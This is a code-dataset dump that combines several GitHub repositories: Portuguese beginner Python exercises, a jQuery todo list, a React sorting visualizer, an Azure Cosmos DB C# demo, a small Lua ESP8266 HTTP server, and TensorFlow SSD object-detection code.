b1dd76fc08e6d814f1d13dc3684a118a6b5a1e0b
ac8cd2a5a3da84741b36ea7747e1e9d4b789e98b
refs/heads/master
<repo_name>rafaelcardoso31101995/treinamento_git<file_sep>/aula07-praticando.py n1 = int(input('Digite o primeiro valor: ')) n2 = int(input('Outro valor: ')) s = n1 + n2 m = n1 * n2 d = n1 / n2 di = n1 // n2 p = n1 ** n2 print('A soma é {}, a multiplicação é {}, a divisão é {}, a divisão inteiro é {}, a potência é {}'.format(s,m,d,di,p)) <file_sep>/aula08-desafio19-guanabara.py import random n1 = str(input('Primeiro aluno: ')) n2 = str(input('Segundo aluno: ')) n3 = str(input('Terceiro aluno: ')) n4 = str(input('Quarto aluno: ')) lista = [n1, n2, n3, n4] escolhido = random.choice(lista) """ Nesse caso o random.choice aceita que você ponha uma lista como ([n1,n2,n3,n4]) ou uma variavel com a lista dentro """ print('O aluno escolhido foi {}'.format(escolhido)) <file_sep>/aula09-desafio25.py name = str(input('Digite o seu nome: ')) name_upper = name.upper() result = 'SILVA' in name_upper print(result) <file_sep>/aula10-desafio32.py year = int(input('Digite o ano(Sem caracter especial entre os números: )')) if year%4 == 0 and year%400 == 0: print('O ano é bissexto.') else: print('O ano não é bissexto.') <file_sep>/aula08-desafio18.py import math angulo = float(input('Digite o valor do angulo: ')) seno = math.sin(math.radians(angulo)) cosseno = math.cos(math.radians(angulo)) tangente = math.tan(math.radians(angulo)) print('O seno do angulo {} é {:.2f}'.format(angulo, seno)) print('O cosseno do angulo {} é {:.2f}'.format(angulo, cosseno)) print('A tangente do angulo {} é {:.2f}'.format(angulo, tangente)) <file_sep>/aula09-desafio23.py number = str(input('Digite um número: ')) length = len(number) if length == 1: print('Unidade: {}'.format(number[0])) if length == 2: unidade = number[1] dezena = number[0] print('Unidade: {}'.format(unidade)) print('Dezena: {}'.format(dezena)) if length == 3: unidade = number[2] dezena = number[1] centena = number[0] print('Unidade: {}\nDezena: {}\nCentena: {}'.format(unidade, dezena, centena)) if length == 4: unidade = number[3] dezena = 
number[2] centena = number[1] milhar = number[0] print('Unidade: {}\nDezena: {}\nCentena: {}\nMilhar: {}'.format(unidade, dezena, centena, milhar)) <file_sep>/aula07-desafio11.py width = float(input('Digite a largura: ')) height = float(input('Digite a altura: ')) area = width * height liters = area/2 print('A quantidade de tinta para pintar uma area de {} metros quadrados é {} litros'.format(area, liters)) <file_sep>/aula10-desafio34.py salary = float(input('Digite o seu salário: ')) if salary >= 1250.00: print('O seu novo salário com aumento de 10% é: {}'.format(salary + (salary*(10/100)))) elif salary < 1250.00: print('O seu novo salário com aumento de 15% é: {}'.format(salary + (salary*(15/100)))) <file_sep>/segundoBoss.py dia = input('Digite o dia: ') mes = input('Digite o mês: ') ano = input('Digite o ano: ') print(dia,'/',mes,'/',ano) <file_sep>/aula07-desafio10.py choose = int(input('1 - Dollar\n2 - Euros\n3 - Pesos\n:')) real = float(input('Digite o valor em reais: ')) dollar = 3.74 euro = 4.23 peso = 0.096 if choose == 1: dollares = real/dollar print('O valor em dollar é: {:.2f}'.format(dollar)) elif choose == 2: euros = real/euro print('O valor em euros é: {:.2f}'.format(euros)) elif choose == 3: pesos = real/peso print(f"O valor em pesos é: {pesos:.2f}") <file_sep>/aula07-desafio06.py n1 = int(input('Digite um valor: ')) dobro = n1*2 triplo = n1*3 raiz = n1**(1/2) print('O dobro é: {} O triplo é: {} A raiz quadrada é {}'.format(dobro, triplo, raiz)) <file_sep>/aula09-desafio26.py frase = str(input('Digite uma frase: ')) frase_upper = frase.upper() amount = frase_upper.count('A') find_result = frase_upper.find('A') print('A quantidade de A que tem na frase é {}'.format(amount)) print('O primeira A aparece na posição {}'.format(find_result)) #Nesse caso o find mostra somente a posição da primeira letra encontrada"i print('A ultima ocorrencia de A aparece na posição {}'.format(frase_upper.rfind('A'))) <file_sep>/aula06-desafio4.py n1 = input('Digite 
qualquer coisa') print(type(n1)) <file_sep>/aula08-desafio19.py import random first_name = input('Digite o primeiro nome: ') second_name = input('Digite o segundo nome: ') third_name = input('Digite o terceiro nome: ') name = random.choice([first_name, second_name, third_name]) print('O nome escolhido foi {}'.format(name)) <file_sep>/usandoFormat.py n1 = int(input('Digite o valor do primeiro numero')) n2 = int(input('Digite o valor do segundo numero')) soma = (n1 + n2) print('A soma entre ',n1, ' e ',n2, 'é', soma) print('A soma entre {} e {} é {}'.format(n1,n2,soma)) <file_sep>/aula10-desafio28.py import random num_random = random.randint(0,5) num_user = int(input('Digite um número entre 0 e 5: ')) if num_user == num_random: print('Você acertou!!!!') else: print('Você errou!!!') print('O número que a máquina escolheu foi: {}'.format(num_random)) <file_sep>/projeto_git2.py real = float(input('Digite o total em reais que você tem: ')) dollar = real/3.27 print('O valor em reais é {:.3f}'.format(dollar)) <file_sep>/biblioteca_math.py import math num = int(input('Digite um numero: ')) raiz = math.sqrt(num) print('O valor digitado foi {} e a sua raiz é {:.2f}'.format(num, raiz)) <file_sep>/aula07-desafio08.py valor = float(input('Digite um valor em metros: ')) v_centimetros = valor*100 v_milimetros = valor*1000 print('Esse é o valor em centimetros é {} e em milimetros é {} '.format(v_centimetros, v_milimetros)) <file_sep>/aula09-desafio22.py name = str(input('Digite o seu nome completo: ')) print('{}'.format(name.upper())) print('{}'.format(name.lower())) print('{}'.format(len(name))) name_nobar = name.replace(' ', '') length = len(name_nobar) print('{}'.format(length)) name_list = name.split() first_name = name_list[0] print('{}'.format(len(first_name))) <file_sep>/aula07-desafio05.py n1 = int(input('Digite um valor: ')) print('O valor é {}, o valor anterior é {} e o valor sucessor é {}'.format(n1, n1-1, n1+1)) <file_sep>/aula08-desafio17.py import math cateto = 
float(input('Digite o valor do cateto: ')) cateto_oposto = float(input('Digite o valor do cateto oposto: ')) hipotenuse = math.sqrt(math.pow(cateto, 2) + math.pow(cateto_oposto, 2)) print('O valor da hipotenusa é {}'.format(hipotenuse)) <file_sep>/aula07-desafio13.py salary = float(input('Digite o seu salario: ')) salary_increase = salary * (15/100) new_salary = salary + salary_increase print('O almento no salario foi de {} e o seu novo salario é {}'.format(salary_increase, new_salary)) <file_sep>/aula06-desafio3-plus.py n1 = int(print('Digite o primeiro valor: ')) n2 = int(print('Digite o segundo valor: ')) resultado = n1 + n2 print('A soma entre {} e {} é {}'.format(n1,n2,resultado)) <file_sep>/aula10-desafio31.py km = float(input('Digite a distância em quilometros: ')) if km <= 200: total = km * 0.50 print('A sua viagem vai custar: {}'.format(total)) else: total = km * 0.45 print('A sua viagem vai custar: {}'.format(total)) <file_sep>/projeto_git.py number = int(input('Escreva um numero inteiro: ')) print('1 * {} = {}'.format(number, number*1)) print('2 * {} = {}'.format(number, number*2)) print('3 * {} = {}'.format(number, number*3)) print('4 * {} = {}'.format(number, number*4)) print('5 * {} = {}'.format(number, number*5)) print('6 * {} = {}'.format(number, number*6)) print('7 * {} = {}'.format(number, number*7)) print('8 * {} = {}'.format(number, number*8)) print('9 * {} = {}'.format(number, number*9)) print('10 * {} = {}'.format(number, number*10)) <file_sep>/aula10-desafio29.py km = float(input('Digite a velocidade em KM: ')) if km > 80.0: total = (km - 80.0) * 7 print('Você foi multado e deve pagar: {}'.format(total)) <file_sep>/aula09-desafio24.py city = str(input('Digite o nome da sua cidade: ')) splited_name = city.split() first_name = splited_name[0] first_name = first_name.upper() test = first_name.find('SANTO') if test != -1: print('A sua cidade começa com SANTO') else: print('A sua cidade não começa com SANTO') <file_sep>/aula08-desafio16.py from 
math import trunc number = float(input('Digite um número com vírgula: ')) number_truncated = trunc(number) print('A parte inteira do valor é: {}'.format(number_truncated)) <file_sep>/aula07-desafio12.py product = float(input('Digite o preço do produto: ')) descount = product * (5/100) product_descounted = product - descount print('O desconto de 5% sobre o preço original do produto, {}, foi {} e o novo preço é {}'.format(product, descount, product_descounted)) <file_sep>/aula07-desafio09.py num = int(input('Digite numero que você deseja a tabuada: ')) i = 1 while i <= 10: print('{} x {} = {}'.format(num, i, (num*i))) i = i + 1 <file_sep>/olamundo.py nome = "<NAME>" idade = 23 peso = 68.5 print(nome,idade,peso) <file_sep>/testedeinput.py nome = input('Qual o seu nome?') idade = input('Qual a sua idade?') peso = input('Qual o seu peso?') print('O seu nome é ',nome,' e você tem ' ,idade, ' anos de idade e seu peso é ' ,peso ,'.') <file_sep>/loop_for.py """ Utilizando for loop O laço for só pode ser uzado com iteraveis(lista, dicionarios, tuplas, string...) 
ex: name = "Rafael" for c in name: print(c) """ name = 'Rafael' for c in name: # Percorre cada letra e printa print(c) # O for loop funciona como o for each no java <file_sep>/aula09-desafio27.py name = str(input('Digite o seu nome: ')) name_list = name.split() length = len(name_list) print('{}'.format(name)) print('Primeiro: {}'.format(name_list[0])) print('Ultimo: {}'.format(name_list[length-1])) <file_sep>/testando_sys.py import sys x = sys.argv[1:] a ='' for c in x: a += c + ' ' print(a) <file_sep>/biblioteca_math2.py from math import sqrt, ceil num = int(input('Digite um valor: ')) raiz = sqrt(num) print('O valor digitado foi {} e sua raiz arredondada é {}'.format(num, ceil(raiz))) <file_sep>/aula10-desafio33.py n1 = float(input('Digite o primeiro número: ')) n2 = float(input('Digite o segundo número: ')) n3 = float(input('Digite o terceiro número: ')) maior = 0 if n1 > n2 and n1 > n3: print('O primeiro número é o maior número: {}'.format(n1)) if n2 > n1 and n2 > n3: print('O segundo número é o maior número: {}'.format(n2)) if n3 > n1 and n3 > n2: print('O segundo número é o maior número: {}'.format(n3)) <file_sep>/if_else_statement.py x = 10 if x <= 10: print('Valor ok') else: print('Valor não baixo')
2ce4c1a6a90cb07e406a143a11d453fcfd64b9a1
[ "Python" ]
39
Python
rafaelcardoso31101995/treinamento_git
b191a0ec139527423de1af6aba129872dd13fe6b
0892fdc4ee2de5baeac5bf05c32d113268928572
refs/heads/master
<file_sep>// check off specific todo by clicking $('ul').on('click', 'li', function() { // click does not work in this case because the future appended li would not be updated at all, which means that it would not be possible to make it completed! // to get the on click valid for all li to be appended in the future, the listener must be on the parent already exiting when the page load!! $(this).toggleClass('completed'); }); $('ul').on('click', 'span', function(event) { // to get the on click valid for all span in appended li in the future, the listener must be on the parent already exiting when the page load!! // click does not work in this case because the future appended li would not be updated at all, which means that it would not be possible to delete it! $(this) .parent() // means that we are on the li to remove the entire li and not the X from the span only .fadeOut(500, function() { $(this).remove(); }); event.stopPropagation(); // span is multi-layered so the event will happen on span but also on li, ul, container, body !! To stop that we need to use stopPropagation() on event }); $('input[type="text"]').keypress(function(event) { if (event.which == 13) { let todoText = $(this).val(); $(this).val(''); $('ul').append( '<li><span><i class="fa fa-trash-alt"></i></span> ' + todoText + '</li>' ); } }); $('span').click(function() { $('input[type="text"]').fadeToggle(); }); <file_sep># UDEMY_jQuery_TodoList UDEMY_jQuery_TodoList_Practice
4c3f7b3ee85de0d739cb4894d5389a4ecc1a1a46
[ "JavaScript", "Markdown" ]
2
JavaScript
Catevika/UDEMY_jQuery_TodoList
61a259739d47d1fc479103b07ed8453d988855b0
38f872051aacc3c39ecf8cc4c2dfb261c0c8e5d9
refs/heads/main
<file_sep>export default function MergeSort(array) { return; }<file_sep>export default function QuickSort(array, steps) { return; }<file_sep>import React from 'react'; import BubbleSort from './Algorithms/BubbleSort'; import MergeSort from './Algorithms/MergeSort'; import QuickSort from './Algorithms/QuickSort'; import './App.css'; import Column from './Components/Column'; const BUBBLE_SORT = 'BubbleSort'; const QUICK_SORT = 'QuickSort'; const MERGE_SORT = 'MergeSort'; const STARTING_LENGTH = 25; const STARTING_SPEED = 1; export default class App extends React.Component { constructor(props) { super(props); this.sort = this.sort.bind(this); this.setSteps = this.setSteps.bind(this); this.animateSteps = this.animateSteps.bind(this); this.state = { array: [], steps: [], colors: [], colorStep: [], algorithm: BUBBLE_SORT, length: STARTING_LENGTH, speed: STARTING_SPEED, } } ALGO = { 'BubbleSort': BubbleSort, 'QuickSort': QuickSort, 'MergeSort': MergeSort }; componentDidMount() { this.generateArray(); } generateArray() { let array = []; let colorStep = []; for (let i = 0; i < this.state.length; i++) { let rand = Math.random()*50; array.push(Math.floor(rand)); colorStep.push("#A5E5D9"); } this.setState({ array: array, colorStep: [...colorStep] }, () => this.setSteps()); } setAlgorithm(algo) { this.setState({ algorithm: algo }, () => this.setSteps()); } setLength(length) { if (this.state.length !== length) { this.setState({ length: length }, () => { this.generateArray(); this.setSteps(); }); } } setSpeed(speed) { this.setState({ speed: speed }); } setSteps() { let array = this.state.array; let steps = this.state.steps; let colors = this.state.colors; this.ALGO[this.state.algorithm](array, steps, colors); this.setState({ steps: steps, colors: colors }); } animateSteps() { for (let i = 0; i < this.state.steps.length; i++) { setTimeout(() => { this.setState({ array: this.state.steps[i], colorStep: this.state.colors[i] }); }, (200/this.state.speed) * i); } } sort() { 
this.animateSteps(); } render() { let columns = this.state.array.map((value, index) => <Column key={index} value={value} color={this.state.colorStep[index]} />); return ( <div className="App"> <h1>Sorting Algorithm Visualizer</h1> <div className="options"> <div className="block algo"> <h3>Algorithm</h3> <button className={this.state.algorithm === BUBBLE_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(BUBBLE_SORT)}>Bubble Sort</button> <button className={this.state.algorithm === QUICK_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(QUICK_SORT)} disabled>Quick Sort</button> <button className={this.state.algorithm === MERGE_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(MERGE_SORT)} disabled>Merge Sort</button> </div> <div className="block length"> <h3>Size</h3> <button className={this.state.length === 25 ? 'active' : ''} onClick={() => this.setLength(25)}>25</button> <button className={this.state.length === 50 ? 'active' : ''} onClick={() => this.setLength(50)}>50</button> <button className={this.state.length === 75 ? 'active' : ''} onClick={() => this.setLength(75)}>75</button> </div> <div className="block speed"> <h3>Speed</h3> <button className={this.state.speed === 1 ? 'active' : ''} onClick={() => this.setSpeed(1)}>1x</button> <button className={this.state.speed === 2 ? 'active' : ''} onClick={() => this.setSpeed(2)}>2x</button> <button className={this.state.speed === 3 ? 'active' : ''} onClick={() => this.setSpeed(3)}>3x</button> </div> <div className="block algo"> <button onClick={this.generateArray.bind(this)}>Generate New Array</button> <button onClick={this.sort}>Sort!</button> </div> </div> <div className="columns"> {columns} </div> </div> ); } } <file_sep># Sorting Algorithm Visualizer This web application was built using React. It provides a visual of various common sorting algorithms such as bubble sort, merge sort, and quick sort. 
This web app was deployed using Github Pages, and the live version can be viewed at: https://alyssadicarlo.github.io/sorting-visualizer/ ![Sorting Algorithm Preview](https://github.com/alyssadicarlo/sorting-visualizer/blob/main/src/Assets/preview.png?raw=true) # TO DO: - [x] Deploy using Github Pages - [x] Mobile friendly UI - [x] Easy to use UI - [x] Bubble sort algorithm - [ ] Quick sort algorithm - [ ] Merge sort algoritm - [x] Color coding sorting steps - [x] Change size of array - [x] Change speed of sort - [x] Generate new random array - [ ] Bug fixes # Usage: - Clone repository - Run `yarn install` in command line to install dependencies - Run `yarn start` & open http://localhost:3000/ to view it in the browser <file_sep>const BubbleSort = (inputArr, arraySteps, colorSteps) => { let array = [...inputArr]; let len = array.length; let colors = new Array(len).fill("#A5E5D9"); for (let i =0; i < len; i++) { for (let j = 0; j < len - i - 1; j++) { if (array[j] > array[j+1]) { let temp = array[j]; array[j] = array[j+1]; array[j+1] = temp } colors[j] = "gray"; colors[j+1] = "gray"; arraySteps.push([...array]); colorSteps.push([...colors]); colors[j] = "#A5E5D9"; colors[j+1] = "#A5E5D9"; } colors[len - i - 1] = "green"; colorSteps[-1] = colors; } colorSteps[colorSteps.length - 1] = new Array(len).fill("green"); }; export default BubbleSort;<file_sep>import React from 'react'; import './Column.css'; export default class Column extends React.Component { render() { let columnStyle = { height: "" + (this.props.value*5) + "px", backgroundColor: this.props.color } return( <div className="column" style={columnStyle}></div> ); } }
5692bf4c827d383f3b989d31d6acdd2c14acc965
[ "JavaScript", "Markdown" ]
6
JavaScript
alyssadicarlo/sorting-visualizer
5cb5fcb2e9a6d5b0d3b220a883ec16228188746d
b0dd2c98ac5515c7f9bda70989d228463f606680
refs/heads/master
<file_sep># 4- Introduction to Azure Cosmos DB 4th meetup session on Mon, Dec 23 2019 An introduction to Azure Cosmos DB and how it is easy to migrate your existing database to Cosmos DB. <file_sep>using Microsoft.EntityFrameworkCore; namespace CosmosDemo.web.Database { public class EmployeeDbContext : DbContext { public EmployeeDbContext(DbContextOptions options) : base(options) { //Database.EnsureCreated(); } public DbSet<Employee> Employees { get; set; } protected override void OnModelCreating(ModelBuilder modelBuilder) { modelBuilder.HasDefaultContainer("employees"); modelBuilder.Entity<Employee>() .ToContainer("employees") .HasNoDiscriminator(); } } } <file_sep>using System; using System.ComponentModel.DataAnnotations; using System.ComponentModel.DataAnnotations.Schema; namespace CosmosDemo.web.Database { public class Employee { [Key,DatabaseGenerated(DatabaseGeneratedOption.None)] public string id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public DateTime HiringDate { get; set; } public string Nationality { get; set; } } }
ca5ed82aad17fe8f3fbadbdd39446568fdfb511d
[ "Markdown", "C#" ]
3
Markdown
azure-kuwait/4-Introduction-to-Azure-Cosmos-DB
1a0b4610ba9f7596fe640fa0e4cd92d95ead0786
c652d2d2edf15c4e916f70ea09ff185a401dd1b7
refs/heads/master
<repo_name>alexsuslov/esp8266-lua-httpd<file_sep>/httpd.lua -- Tiny http server local http = {} -- parse req http.req = function(req) local err = nil local REQ = {query={}, head={}} local _, _, method, path, vars = string.find(req, "^([A-Z]+) (.+)%?(.+) HTTP"); if ( method == nil ) then local _, _, method, path = string.find(req, "(^[A-Z]+) (.+) HTTP") else -- разобрать vars for k, v in string.gmatch(vars, "(%w+)=(%w+)&*") do REQ.query[k] = v end end -- @todo: parse headers -- @todo: parse body -- @todo: user auth REQ.path = path REQ.method = method return err, REQ end function http.route( socket, REQ, fn ) if file.open(REQ.method .. "_" .. REQ.path ..'lc') then file.close() -- @att: добавить в вывод -- client:send("HTTP/1.1 200 OK\r\n"); -- client:send("Content-type: text/html\r\n"); return dofile(REQ.method .. "_" .. REQ.path ..'lc')(socket, REQ, fn) else socket:send("HTTP/1.1 404 OK\r\n") fn() end end function http.done( socket ) socket:send("Connection: close\r\n\r\n"); socket:close(); collectgarbage("collect"); end function http.request( socket, req ) local err, REQ = http.req(req) if err ~= nil then socket:send("HTTP/1.1 500 OK\r\n") http.done( socket ) else http.route( socket, REQ , function() http.done(socket) end) end end function http.init( port ) -- timeout 100ms srv = net.createServer( net.TCP, 100) srv:listen( port, function(socket) socket:on("receive", http.request) end) end return http<file_sep>/README.md # esp8266-lua-httpd Simple http server # Install ```bash wget https://raw.githubusercontent.com/alexsuslov/esp8266-lua-httpd/master/httpd.lua ``` # Use ```lua httpd = require("httpd") http.init(80) ```
cb58aad3b2835140b51ac2546f3e95175627b319
[ "Markdown", "Lua" ]
2
Lua
alexsuslov/esp8266-lua-httpd
61ab8e942f88300a3cc8d565f6861552b6b7817a
b6a6c3006fd0525b528c92dbc4e40e96c3f94c88
refs/heads/master
<file_sep># deep_learning_notes 深度学习笔记 --- 深度学习算法重现 <file_sep>import tensorflow as tf import SSD.util_tf def bboxes_intersection(bbox_ref, bboxes, name=None): """Compute relative intersection between a reference box and a collection of bounding boxes. Namely, compute the quotient between intersection area and box area. Args: bbox_ref: (N, 4) or (4,) Tensor with reference bounding box(es). bboxes: (N, 4) Tensor, collection of bounding boxes. Return: (N,) Tensor with relative intersection. 计算参考框和 边界框集合。也就是说,计算 交叉区和盒子区。 ARG: b框参考:(n,4)或(4,)张量与参考边界框(es)。 bbox:(n,4)张量,边界框集合。 返回: (n,)张量与相对交集。 """ with tf.name_scope(name, 'bboxes_intersection'): # Should be more efficient to first transpose. bboxes = tf.transpose(bboxes) bbox_ref = tf.transpose(bbox_ref) # Intersection bbox and volume. int_ymin = tf.maximum(bboxes[0], bbox_ref[0]) int_xmin = tf.maximum(bboxes[1], bbox_ref[1]) int_ymax = tf.minimum(bboxes[2], bbox_ref[2]) int_xmax = tf.minimum(bboxes[3], bbox_ref[3]) h = tf.maximum(int_ymax - int_ymin, 0.) w = tf.maximum(int_xmax - int_xmin, 0.) # Volumes. inter_vol = h * w # 各个框在[0,0,1,1]内的面积 bboxes_vol = (bboxes[2] - bboxes[0]) * (bboxes[3] - bboxes[1]) # 各个框面积 scores = tf.where( tf.greater(bboxes_vol, 0), tf.divide(inter_vol, bboxes_vol), tf.zeros_like(inter_vol), name='intersection') return scores def bboxes_filter_overlap(labels, bboxes, threshold=0.5, assign_negative=False, scope=None): """Filter out bounding boxes based on (relative )overlap with reference box [0, 0, 1, 1]. Remove completely bounding boxes, or assign negative labels to the one outside (useful for latter processing...). Return: labels, bboxes: Filtered (or newly assigned) elements. 
""" with tf.name_scope(scope, 'bboxes_filter', [labels, bboxes]): # (N,) Tensor:和[0,0,1,1]相交面积大于0的位置返回面积比(相交/原本),小于0的位置返回0 scores = bboxes_intersection(tf.constant([0, 0, 1, 1], bboxes.dtype), bboxes) mask = scores > threshold if assign_negative: # 保留所有的label和框,重叠区不够的label置负 labels = tf.where(mask, labels, -labels) # 交叉满足的标记为正,否则为负 else: # 删除重叠区不够的label和框 labels = tf.boolean_mask(labels, mask) # bool掩码,类似于array的bool切片 bboxes = tf.boolean_mask(bboxes, mask) return labels, bboxes def bboxes_resize(bbox_ref, bboxes, name=None): """ 使用新的参考点和基底长度(bbox_ref)重置bboxes的表示 :param bbox_ref: 参考框,左上角点为新的参考点,hw为新的参考基 :param bboxes: 目标框 :param name: 域名 :return: 目标框重新表示后的写法 """ # Tensors inputs. with tf.name_scope(name, 'bboxes_resize'): # Translate. # bbox_ref:['ymin', 'xmin', 'ymax', 'xmax'] v = tf.stack([bbox_ref[0], bbox_ref[1], bbox_ref[0], bbox_ref[1]]) bboxes = bboxes - v # Scale. s = tf.stack([bbox_ref[2] - bbox_ref[0], # h bbox_ref[3] - bbox_ref[1], # w bbox_ref[2] - bbox_ref[0], bbox_ref[3] - bbox_ref[1]]) bboxes = bboxes / s return bboxes def distorted_bounding_box_crop(image, labels, bboxes, min_object_covered=0.3, aspect_ratio_range=(0.9, 1.1), area_range=(0.1, 1.0), max_attempts=200, scope=None): """Generates cropped_image using a one of the bboxes randomly distorted. See `tf.image.sample_distorted_bounding_box` for more documentation. Args: image: 3-D Tensor of image (it will be converted to floats in [0, 1]). bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords] where each coordinate is [0, 1) and the coordinates are arranged as [ymin, xmin, ymax, xmax]. If num_boxes is 0 then it would use the whole image. min_object_covered: An optional `float`. Defaults to `0.1`. The cropped area of the image must contain at least this fraction of any bounding box supplied. aspect_ratio_range: An optional list of `floats`. The cropped area of the image must have an aspect ratio = width / height within this range. area_range: An optional list of `floats`. 
The cropped area of the image must contain a fraction of the supplied image within in this range. max_attempts: An optional `int`. Number of attempts at generating a cropped region of the image of the specified constraints. After `max_attempts` failures, return the entire image. scope: Optional scope for name_scope. Returns: A tuple, a 3-D Tensor cropped_image and the distorted bbox """ with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bboxes]): # 高级的随机裁剪 # The bounding box coordinates are floats in `[0.0, 1.0]` relative to the width # and height of the underlying image. # 1-D, 1-D, [1, 1, 4] bbox_begin, bbox_size, distort_bbox = tf.image.sample_distorted_bounding_box( tf.shape(image), bounding_boxes=tf.expand_dims(bboxes, 0), # [1, n, 4] min_object_covered=min_object_covered, aspect_ratio_range=aspect_ratio_range, area_range=area_range, max_attempts=max_attempts, # 最大尝试裁剪次数,失败则返回原图 use_image_if_no_bounding_boxes=True) ''' Returns: A tuple of `Tensor` objects (begin, size, bboxes). begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing `[offset_height, offset_width, 0]`. Provide as input to `tf.slice`. size: A `Tensor`. Has the same type as `image_size`. 1-D, containing `[target_height, target_width, -1]`. Provide as input to `tf.slice`. bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing the distorted bounding box. Provide as input to `tf.image.draw_bounding_boxes`. ''' # [4],裁剪结果相对原图的(y, x, h, w) distort_bbox = distort_bbox[0, 0] # Crop the image to the specified bounding box. cropped_image = tf.slice(image, bbox_begin, bbox_size) # Restore the shape since the dynamic slice loses 3rd dimension. cropped_image.set_shape([None, None, 3]) # <-----设置了尺寸了哈 # Update bounding boxes: resize and filter out. 
# 以裁剪子图为参考,将bboxes更换参考点和基长度 bboxes = bboxes_resize(distort_bbox, bboxes) # [4], [n, 4] # 筛选变换后的bboxes和裁剪子图交集大于阈值的图bboxes labels, bboxes = bboxes_filter_overlap(labels, bboxes, threshold=0.5, assign_negative=False) # 返回随机裁剪的图片,筛选调整后的labels(n,)、bboxes(n, 4),裁剪图片对应原图坐标(4,) return cropped_image, labels, bboxes, distort_bbox def preprocess_image(image, labels, bboxes, out_shape, scope='ssd_preprocessing_train'): with tf.name_scope(scope, 'ssd_preprocessing_train', [image, labels, bboxes]): if image.get_shape().ndims != 3: raise ValueError('Input must be of size [height, width, C>0]') # Convert to float scaled [0, 1]. # 并不单单是float化,而是将255像素表示放缩为01表示 if image.dtype != tf.float32: image = tf.image.convert_image_dtype(image, dtype=tf.float32) # (有条件的)随机裁剪,筛选调整后的labels(n,)、bboxes(n, 4),裁剪图片对应原图坐标(4,) dst_image, labels, bboxes, distort_bbox = \ distorted_bounding_box_crop(image, labels, bboxes, min_object_covered=0.25, aspect_ratio_range=(0.6, 1.67)) # Resize image to output size. dst_image = SSD.util_tf.resize_image(dst_image, out_shape, method=tf.image.ResizeMethod.BILINEAR, align_corners=False) # Randomly flip the image horizontally. dst_image, bboxes = SSD.util_tf.random_flip_left_right(dst_image, bboxes) # Randomly distort the colors. There are 4 ways to do it. dst_image = SSD.util_tf.apply_with_random_selector( dst_image, lambda x, ordering: SSD.util_tf.distort_color(x, ordering, False), num_cases=4) # Rescale to VGG input scale. image = dst_image * 255. 
image = SSD.util_tf.tf_image_whitened(image) # mean = tf.constant(means, dtype=image.dtype) # image = image - mean # 'NHWC' (n,) (n, 4) return image, labels, bboxes <file_sep>import tensorflow as tf import numpy as np import cv2 import datetime class ssd(object): def __init__(self): self.feature_map_size = [[38, 38], [19, 19], [10, 10], [5, 5], [3, 3], [1, 1]] self.classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"] self.feature_layers = ['block4', 'block7', 'block8', 'block9', 'block10', 'block11'] self.img_size = (300,300) self.num_classes = 21 self.boxes_len = [4,6,6,6,4,4] self.isL2norm = [True,False,False,False,False,False] self.anchor_sizes = [[21., 45.], [45., 99.], [99., 153.],[153., 207.],[207., 261.], [261., 315.]] self.anchor_ratios = [[2, .5], [2, .5, 3, 1. / 3], [2, .5, 3, 1. / 3], [2, .5, 3, 1. / 3], [2, .5], [2, .5]] # self.anchor_steps = [8, 16, 32, 64, 100, 300] self.anchor_steps = [8, 16, 30, 60, 100, 300] self.prior_scaling = [0.1, 0.1, 0.2, 0.2] #特征图先验框缩放比例 self.n_boxes = [5776,2166,600,150,36,4] #8732个 self.threshold = 0.25 ########### ssd网络架构部分 def l2norm(self,x, trainable=True, scope='L2Normalization'): n_channels = x.get_shape().as_list()[-1] # 通道数 l2_norm = tf.nn.l2_normalize(x, dim=[3], epsilon=1e-12) # 只对每个像素点在channels上做归一化 with tf.variable_scope(scope): gamma = tf.get_variable("gamma", shape=[n_channels, ], dtype=tf.float32, trainable=trainable) return l2_norm * gamma def conv2d(self,x,filter,k_size,stride=[1,1],padding='same',dilation=[1,1],activation=tf.nn.relu,scope='conv2d'): return tf.layers.conv2d(inputs=x, filters=filter, kernel_size=k_size, strides=stride, dilation_rate=dilation, padding=padding, name=scope, activation=activation) def max_pool2d(self,x, pool_size, stride, scope='max_pool2d'): return tf.layers.max_pooling2d(inputs=x, pool_size=pool_size, strides=stride, 
name=scope, padding='same') def pad2d(self,x, pad): return tf.pad(x, paddings=[[0, 0], [pad, pad], [pad, pad], [0, 0]]) def dropout(self,x, d_rate=0.5): return tf.layers.dropout(inputs=x, rate=d_rate) def ssd_prediction(self, x, num_classes, box_num, isL2norm, scope='multibox'): reshape = [-1] + x.get_shape().as_list()[1:-1] # 去除第一个和最后一个得到shape with tf.variable_scope(scope): if isL2norm: x = self.l2norm(x) print(x) # #预测位置 --》 坐标和大小 回归 location_pred = self.conv2d(x, filter=box_num * 4, k_size=[3,3], activation=None,scope='conv_loc') location_pred = tf.reshape(location_pred, reshape + [box_num, 4]) # 预测类别 --> 分类 sofrmax class_pred = self.conv2d(x, filter=box_num * num_classes, k_size=[3,3], activation=None, scope='conv_cls') class_pred = tf.reshape(class_pred, reshape + [box_num, num_classes]) print(location_pred, class_pred) return location_pred, class_pred def set_net(self,x=None): check_points = {} predictions = [] locations = [] logit = [] x_re = False if x is None: x = tf.placeholder(dtype=tf.float32,shape=[None,300,300,3]) x_re = True with tf.variable_scope('ssd_300_vgg'): #b1 net = self.conv2d(x,filter=64,k_size=[3,3],scope='conv1_1') net = self.conv2d(net,64,[3,3],scope='conv1_2') net = self.max_pool2d(net,pool_size=[2,2],stride=[2,2],scope='pool1') #b2 net = self.conv2d(net, filter=128, k_size=[3, 3], scope='conv2_1') net = self.conv2d(net, 128, [3, 3], scope='conv2_2') net = self.max_pool2d(net, pool_size=[2, 2], stride=[2, 2], scope='pool2') #b3 net = self.conv2d(net, filter=256, k_size=[3, 3], scope='conv3_1') net = self.conv2d(net, 256, [3, 3], scope='conv3_2') net = self.conv2d(net, 256, [3, 3], scope='conv3_3') net = self.max_pool2d(net, pool_size=[2, 2], stride=[2, 2], scope='pool3') #b4 net = self.conv2d(net, filter=512, k_size=[3, 3], scope='conv4_1') net = self.conv2d(net, 512, [3, 3], 